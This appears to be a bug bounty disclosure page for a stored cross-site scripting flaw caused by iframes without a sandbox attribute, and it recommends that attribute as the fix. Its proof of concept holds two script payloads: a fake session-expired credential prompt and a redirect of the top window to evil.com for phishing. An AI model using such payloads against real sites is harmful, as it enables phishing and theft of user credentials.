Lucene search

K
huntr416e6e61B04DF4E3-AE5A-4DC6-81EC-496248B15F3C
HistoryMar 05, 2022 - 2:24 p.m.

Cross-site Scripting (XSS) - Stored

2022-03-0514:24:54
416e6e61
www.huntr.dev
16
cross-site scripting
iframe
sandbox attribute
malicious javascript
phishing
attack
firefox
vulnerability
data theft
bug bounty

EPSS

0.001

Percentile

21.4%

Description

Iframe tags don’t have a sandbox attribute, this makes an attacker able to execute malicious javascript via an iframe and perform phishing attacks.
The sandbox attribute will block script execution and prevents the content to navigate its top-level browsing context which will stop this type of attack.

Proof of Concept

Tested on firefox.


<script>alert("Your session has expired, Please enter your credential again")</script>
<script>window.top.location.href = "http://evil.com"; </script

Deepin-Screenshot-select-area-20220305174956.png

Deepin-Screenshot-select-area-20220305175010.png

Impact

This vulnerability is capable of phishing and stealing users’ data.

EPSS

0.001

Percentile

21.4%

Related for B04DF4E3-AE5A-4DC6-81EC-496248B15F3C